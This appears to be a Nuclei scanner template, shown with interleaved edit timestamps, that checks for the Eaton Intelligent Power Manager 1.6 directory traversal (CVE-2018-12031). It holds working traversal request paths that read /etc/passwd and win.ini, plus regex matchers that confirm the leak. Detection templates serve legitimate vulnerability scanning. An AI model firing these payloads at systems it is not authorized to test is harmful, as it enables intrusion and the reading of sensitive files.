2021-07-16 11:56:28 +00:00
id : CVE-2018-12031
2021-07-16 11:52:12 +00:00
info :
name : Eaton Intelligent Power Manager 1.6 - Directory Traversal
author : daffainfo
2021-09-10 11:26:40 +00:00
severity : critical
2022-05-13 20:26:43 +00:00
description : Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution.
2021-08-18 11:37:49 +00:00
reference :
2021-07-16 11:52:12 +00:00
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
- https://www.exploit-db.com/exploits/48614
2022-05-13 20:26:43 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-12031
cwe-id : CWE-22
2022-04-22 10:38:41 +00:00
tags : cve,cve2018,lfi
2021-07-16 11:52:12 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd"
2021-07-16 12:12:00 +00:00
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"
2021-07-16 11:52:12 +00:00
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-16 12:06:12 +00:00
- "\\[(font|extension|file)s\\]"
condition : or
2021-07-16 11:52:12 +00:00
part : body
- type : status
status :
- 200
2022-05-13 20:26:43 +00:00
# Enhanced by mp on 2022/05/12